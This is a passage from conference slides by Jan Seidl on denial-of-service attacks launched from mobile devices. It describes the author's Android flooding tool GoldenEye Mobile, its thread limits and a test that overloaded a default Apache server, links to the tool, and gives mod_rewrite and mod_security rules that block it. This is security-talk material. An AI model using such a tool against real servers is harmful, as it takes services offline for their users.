82. Mobile-launched Denial-of-Service
Objective
Test if mobile devices alone could conduct a successful DoS
attack.
Test if equipment and configurations are able to deter DoS
attacks from mobile platforms.
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
83. Mobile-launched Denial-of-Service
Android: Limitations
Max 128 threads (Android 2.1)
Maximum number of concurrent sockets per thread: 30 (>30
too many open files)
Can we get better results if device is 'rooted'
(sysctl) ?
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
84. Mobile-launched Denial-of-Service
Firepower
5 min test on an Apache webserver, default
configuration, in a Debian 6 virtual
machine, also with default configuration.
CPU Usage: u5.85 s4.52 cu0 cs0 2.37% CPU
load
Low CPU fingerprint
Server overloaded
(a.k.a. down)
https://github.com/jseidl/GoldenEye-Mobile
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
85. Mobile-launched Denial-of-Service
GoldenEye Mobile: Mitigation
GoldenEye Mobile uses HEAD method for maximum speed.
Easily blocked (Module: Mod_Rewrite)
RewriteEngine on
RewriteCond %{THE_REQUEST} !^(GET|POST) /.* HTTP/1.1$
RewriteRule .* [F]
mod_security
SecFilterSelective REQUEST_METHOD "!^(GET|POST)$" "deny,auditlog,status:405"
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
86. Demo: DoS Fun
GoldenEye Mobile DoS Android Tool Demo!
http://bit.ly/GoldenEyeMDOS
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
87. Questions?
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
88. Thanks!
– To Peace!
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
89. Thanks!
Thanks for your time!
jseidl@wroot.org / http://wroot.org
https://github.com/jseidl
http://www.slideshare.net/jseidl
@jseidl
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil